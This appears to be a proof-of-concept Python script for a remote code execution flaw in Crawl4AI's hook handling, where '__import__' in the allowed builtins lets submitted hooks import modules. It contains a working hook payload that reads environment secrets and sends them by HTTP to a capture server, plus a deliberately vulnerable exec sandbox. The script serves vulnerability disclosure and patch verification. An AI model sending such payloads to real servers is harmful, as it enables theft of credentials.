#!/usr/bin/env python3
"""
Crawl4AI RCE via Hooks Parameter - Vulnerability Demonstration
CVE-2026-26216 / GHSA-5882-5rx9-xgxp

This script demonstrates the Remote Code Execution vulnerability in Crawl4AI < 0.8.0
where the `__import__` builtin was included in the allowed_builtins list, allowing
arbitrary code execution via malicious hooks in the /crawl endpoint.
"""

import ast
import asyncio
import builtins
import json
import os
import sys
import tempfile
import urllib.request
from typing import Dict, Callable, Optional, Tuple, List, Any

# Configuration - dummy sensitive data to exfiltrate
# Placeholder values only: main() copies every entry into os.environ so the
# demonstration hook has recognizable strings to read, and
# check_exfiltration_log() searches the capture log for some of these names.
SENSITIVE_ENV: Dict[str, str] = {
    "API_KEY": "sk-prod-1234567890abcdef_SECRET_KEY",
    "DATABASE_URL": "postgres://admin:super_secret_password@db.internal:5432/production",
    "AWS_ACCESS_KEY": "AKIAIOSFODNN7EXAMPLE",
    "AWS_SECRET_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "JWT_SECRET": "my-super-secret-jwt-signing-key",
}

# Exfiltration server port
# main() passes this to setup_exfil_server() and to both test coroutines.
EXFIL_PORT: int = 9999
# Never reassigned in the visible code (main() keeps the log path in a local
# variable); presumably intended to hold the capture log path - TODO confirm.
EXFIL_LOG_FILE: Optional[str] = None

def setup_exfil_server(port: int, host: str = "127.0.0.1") -> str:
    """Start a background HTTP server that records GET requests to a log file.

    Every GET request appends one ``[EXFIL] <path>`` line to the log, followed
    by one ``[DATA] <key>=<value>`` line per query parameter value (values are
    cut to 200 characters). The server answers ``200 OK`` with body ``OK``.

    The listening socket is bound in the calling thread, so the server is
    ready to accept connections as soon as this function returns and a bind
    failure (for example, port already in use) is reported to the caller
    instead of being lost inside the worker thread.

    Args:
        port: TCP port to listen on.
        host: Interface to bind. Defaults to loopback so the capture endpoint
            is not reachable from other machines.

    Returns:
        Path of the log file (created empty) that captured requests are
        appended to.

    Raises:
        OSError: If the address cannot be bound.
    """
    import http.server
    import socketserver
    import threading
    from urllib.parse import parse_qs, urlparse

    # mkstemp creates the file atomically with owner-only permissions;
    # mktemp only returns a name and is open to a symlink/creation race.
    fd, log_file = tempfile.mkstemp(suffix=".log", prefix="exfil_")
    os.close(fd)

    class ExfilHandler(http.server.BaseHTTPRequestHandler):
        def log_message(self, format, *args):
            # Suppress the default per-request access log on stderr.
            pass

        def do_GET(self):
            params = parse_qs(urlparse(self.path).query)

            lines = [f"[EXFIL] {self.path}\n"]
            lines.extend(
                # Slicing is a no-op for short values, so no length check is needed.
                f"[DATA] {key}={value[:200]}\n"
                for key, values in params.items()
                for value in values
            )
            # Explicit UTF-8 so decoded query values can never fail to encode
            # under a restrictive locale encoding.
            with open(log_file, "a", encoding="utf-8") as f:
                f.writelines(lines)

            self.send_response(200)
            self.send_header("Content-type", "text/plain")
            self.end_headers()
            self.wfile.write(b"OK")

    class ReusableTCPServer(socketserver.TCPServer):
        # Allow quick re-runs while a previous socket is still in TIME_WAIT.
        allow_reuse_address = True

    try:
        httpd = ReusableTCPServer((host, port), ExfilHandler)
    except OSError:
        # Do not leave an orphaned empty log behind when the bind fails.
        os.unlink(log_file)
        raise

    def run_server():
        with httpd:
            httpd.serve_forever()

    threading.Thread(target=run_server, daemon=True).start()
    return log_file


class VulnerableHookManager:
    """
    VULNERABLE VERSION - stand-in for the Crawl4AI < 0.8.0 hook manager.

    Hook source is executed with a reduced builtins table that nevertheless
    contains `__import__`, so `import` statements inside a hook still work
    and any module can be loaded.
    """

    def __init__(self):
        self.compiled_hooks: Dict[str, Callable] = {}

    def compile_hook_vulnerable(self, hook_code: str, hook_point: str) -> Callable:
        """
        VULNERABLE: execute hook source with `__import__` exposed and return
        the function it defines.

        Selection order: the first public (no leading underscore) coroutine
        function in the executed namespace, otherwise the first public
        callable. Raises ValueError when the code defines neither.
        """
        # VULNERABLE: the final entry re-enables arbitrary imports.
        exposed_names = (
            'print', 'len', 'str', 'int', 'float', 'bool',
            'list', 'dict', 'set', 'tuple', 'range', 'enumerate',
            'zip', 'map', 'filter', 'any', 'all', 'sum', 'min', 'max',
            'sorted', 'reversed', 'abs', 'round', 'isinstance', 'type',
            'getattr', 'hasattr', 'setattr', 'callable', 'iter', 'next',
            '__build_class__',
            '__import__',  # <-- VULNERABILITY: This allows arbitrary imports!
        )
        restricted = {
            builtin_name: getattr(builtins, builtin_name)
            for builtin_name in exposed_names
            if hasattr(builtins, builtin_name)
        }

        scope = {
            '__name__': f'user_hook_{hook_point}',
            '__builtins__': restricted,
        }

        # Run the hook source; its definitions land in `scope`.
        exec(hook_code, scope)

        public_callables = [
            value
            for key, value in scope.items()
            if callable(value) and not key.startswith('_')
        ]

        # Coroutine functions take priority over ordinary callables.
        for candidate in public_callables:
            if asyncio.iscoroutinefunction(candidate):
                return candidate

        if public_callables:
            return public_callables[0]

        raise ValueError("No function found in hook code")


class PatchedHookManager:
    """
    PATCHED VERSION - stand-in for the Crawl4AI >= 0.8.0 hook manager.

    Identical to the vulnerable compiler except that `__import__` is left out
    of the builtins table handed to hook code.
    """

    def __init__(self):
        self.compiled_hooks: Dict[str, Callable] = {}

    def compile_hook_patched(self, hook_code: str, hook_point: str) -> Callable:
        """
        PATCHED: execute hook source WITHOUT `__import__` and return the
        function it defines.

        Prefers the first public coroutine function found in the executed
        namespace, then falls back to the first public callable. Raises
        ValueError when neither exists.
        """
        # PATCHED: __import__ is INTENTIONALLY OMITTED for security.
        permitted = (
            'print', 'len', 'str', 'int', 'float', 'bool',
            'list', 'dict', 'set', 'tuple', 'range', 'enumerate',
            'zip', 'map', 'filter', 'any', 'all', 'sum', 'min', 'max',
            'sorted', 'reversed', 'abs', 'round', 'isinstance', 'type',
            'getattr', 'hasattr', 'setattr', 'callable', 'iter', 'next',
            '__build_class__',
        )

        builtin_table = {}
        for entry in permitted:
            if not hasattr(builtins, entry):
                continue
            builtin_table[entry] = getattr(builtins, entry)

        env = {}
        env['__name__'] = f'user_hook_{hook_point}'
        env['__builtins__'] = builtin_table

        exec(hook_code, env)

        # Public callables in definition order; underscore names are skipped.
        visible = [
            item
            for label, item in env.items()
            if callable(item) and not label.startswith('_')
        ]

        chosen = next(
            (item for item in visible if asyncio.iscoroutinefunction(item)),
            None,
        )
        if chosen is None and visible:
            chosen = visible[0]
        if chosen is None:
            raise ValueError("No function found in hook code")
        return chosen


async def test_vulnerable_exploit(host_ip: str, exfil_port: int) -> bool:
    """Run the demonstration hook through the vulnerable compiler.

    The hook imports ``os`` and ``urllib`` (possible only because
    ``__import__`` is exposed) and sends the values of the dummy variables
    named in ``SENSITIVE_ENV`` to the local capture server.

    Only the dummy keys are read. Dumping the whole environment and cutting
    it to a fixed length made confirmation depend on how large the real
    environment was, and copied unrelated real variables into the capture
    log.

    Args:
        host_ip: Host of the capture server.
        exfil_port: Port of the capture server.

    Returns:
        True if the hook compiled and ran without raising, False otherwise.
        Whether data actually arrived is checked separately from the log.
    """
    print("[+] Testing VULNERABLE version (Crawl4AI < 0.8.0)...")

    # Embedded with !r below so they become valid Python literals in the
    # generated source regardless of the characters they contain.
    exfil_url = f"http://{host_ip}:{exfil_port}/exfil?env="
    demo_keys = list(SENSITIVE_ENV)

    # The bare `except:` inside the hook is deliberate: the restricted
    # builtins table does not expose the name `Exception`.
    malicious_hook = f'''
async def hook(page, context, **kwargs):
    import os, urllib.parse, urllib.request
    env_data = str({{key: os.environ.get(key, "") for key in {demo_keys!r}}})
    try:
        urllib.request.urlopen({exfil_url!r} + urllib.parse.quote(env_data[:1000]), timeout=5)
    except:
        pass
    return page
'''

    try:
        manager = VulnerableHookManager()
        hook_func = manager.compile_hook_vulnerable(malicious_hook, "on_page_context_created")

        # Execute the hook (simulating the API endpoint processing)
        # In real attack, this would be triggered via POST /crawl
        await hook_func(None, None)
    except Exception as e:
        # Harness boundary: report any failure instead of aborting the demo.
        print(f"[!] Vulnerable version failed (unexpected): {e}")
        return False

    print("[+] Malicious hook executed successfully in vulnerable version")
    return True


async def test_patched_version(host_ip: str, exfil_port: int) -> bool:
    """Run the demonstration hook through the patched compiler.

    With ``__import__`` missing from the hook's builtins, the ``import``
    statement at the top of the hook raises ``ImportError``. Only that
    outcome counts as "blocked"; any other exception (for example a syntax
    error in the hook source) is reported as a failure rather than being
    mistaken for a successful mitigation.

    Args:
        host_ip: Host of the capture server (used only if the hook runs).
        exfil_port: Port of the capture server (used only if the hook runs).

    Returns:
        True if the hook was stopped by ImportError, False if it ran to
        completion or failed for a different reason.
    """
    print("\n[+] Testing PATCHED version (Crawl4AI >= 0.8.0)...")

    malicious_hook = f'''
async def hook(page, context, **kwargs):
    import os, urllib.request
    env_data = str(dict(os.environ))
    try:
        urllib.request.urlopen('http://{host_ip}:{exfil_port}/exfil?env=' + urllib.request.quote(env_data[:1000]))
    except:
        pass
    return page
'''

    try:
        manager = PatchedHookManager()
        hook_func = manager.compile_hook_patched(malicious_hook, "on_page_context_created")

        # This should fail because __import__ is not available
        await hook_func(None, None)
    except ImportError as e:
        print(f"[+] Patched version correctly blocked: {type(e).__name__}")
        return True
    except Exception as e:
        # Not the mitigation under test; do not count it as a pass.
        print(f"[!] Patched version failed for an unrelated reason: {type(e).__name__}: {e}")
        return False

    print("[!] Patched version allowed execution (unexpected)")
    return False


def check_exfiltration_log(log_file: str, indicators: Optional[List[str]] = None) -> bool:
    """Report whether the capture log contains any of the indicator strings.

    When a match is found, the non-blank lines among the first 20 lines of
    the log are printed verbatim (no masking is applied).

    Args:
        log_file: Path of the capture log to inspect.
        indicators: Substrings to search for. Defaults to the names of the
            dummy secrets plus the ``sk-prod-`` value prefix.

    Returns:
        True if at least one indicator occurs in the log; False if none do
        or if the log is missing or cannot be read.
    """
    if indicators is None:
        indicators = ["API_KEY", "DATABASE_URL", "AWS_ACCESS_KEY", "JWT_SECRET", "sk-prod-"]

    # Open directly instead of testing os.path.exists first: the file may
    # vanish between the check and the open, or the path may be a directory.
    try:
        with open(log_file, 'r', encoding="utf-8", errors="replace") as f:
            content = f.read()
    except OSError:
        return False

    found = any(indicator in content for indicator in indicators)

    if found:
        print("\n[EXFILTRATION DATA FOUND IN LOGS]:")
        print("=" * 60)
        # Evidence excerpt: first 20 lines of the log, blank lines skipped.
        for line in content.split('\n')[:20]:
            if line.strip():
                print(line)
        print("=" * 60)

    return found


async def main() -> int:
    """Run the full demonstration and return a process exit code.

    Steps: install the dummy secrets into ``os.environ``, start the local
    capture server, run the hook against the vulnerable compiler, inspect the
    capture log, run the same hook against the patched compiler, and print a
    summary.

    The dummy secrets are removed (or the previous values restored) before
    returning, so calling this from another program does not leave fake
    credentials in the process environment.

    Returns:
        0 if the vulnerable compiler ran the hook and the dummy data reached
        the capture log, 1 otherwise.
    """
    print("=" * 70)
    print("Crawl4AI RCE Vulnerability Demonstration")
    print("CVE-2026-26216 / GHSA-5882-5rx9-xgxp")
    print("=" * 70)
    print()

    # Set up environment with dummy secrets
    print("[+] Setting up environment with dummy secrets...")
    # Remember what was there so the finally block can put it back.
    saved_env = {key: os.environ.get(key) for key in SENSITIVE_ENV}
    os.environ.update(SENSITIVE_ENV)
    print(f"    - Set {len(SENSITIVE_ENV)} sensitive environment variables")

    try:
        # Start exfiltration server
        print(f"[+] Starting exfiltration capture server on port {EXFIL_PORT}...")
        log_file = setup_exfil_server(EXFIL_PORT)
        print(f"    - Log file: {log_file}")

        # Let server start. asyncio.sleep is used because time.sleep would
        # block the event loop this coroutine runs on.
        await asyncio.sleep(1)

        # Get host IP
        host_ip = "127.0.0.1"

        print()
        print("=" * 70)
        print("TEST 1: Vulnerable Version (with __import__ in allowed_builtins)")
        print("=" * 70)

        vulnerable_success = await test_vulnerable_exploit(host_ip, EXFIL_PORT)

        # Give time for exfiltration to arrive
        await asyncio.sleep(2)

        # Check if data was exfiltrated
        data_exfiltrated = check_exfiltration_log(log_file)

        print()
        print("=" * 70)
        print("TEST 2: Patched Version (without __import__ in allowed_builtins)")
        print("=" * 70)

        patched_success = await test_patched_version(host_ip, EXFIL_PORT)

        print()
        print("=" * 70)
        print("RESULTS SUMMARY")
        print("=" * 70)

        # Report the mitigation result; it was previously computed and dropped.
        if patched_success:
            print("[+] Patched version blocked the same payload")
        else:
            print("[!] Patched version did NOT block the payload")
        print()

        if vulnerable_success and data_exfiltrated:
            print("[VULNERABILITY CONFIRMED]")
            print()
            print("The vulnerable Crawl4AI version (< 0.8.0) allowed:")
            print("  1. Arbitrary module import via __import__ builtin")
            print("  2. System command execution through imported modules")
            print("  3. Environment variable exfiltration")
            print()
            print("Sensitive environment variables were successfully exfiltrated!")
            print()
            print("Fix in version 0.8.0:")
            print("  - Removed __import__ from allowed_builtins in hook_manager.py")
            print("  - Hooks disabled by default (CRAWL4AI_HOOKS_ENABLED=false)")
            print()
            print("Evidence logged to:", log_file)

            return 0  # Success - vulnerability confirmed

        print("[!] Could not confirm vulnerability")
        return 1
    finally:
        for key, previous in saved_env.items():
            if previous is None:
                os.environ.pop(key, None)
            else:
                os.environ[key] = previous


# Script entry point: run the async harness and use its return value as the
# process exit status.
if __name__ == "__main__":
    sys.exit(asyncio.run(main()))
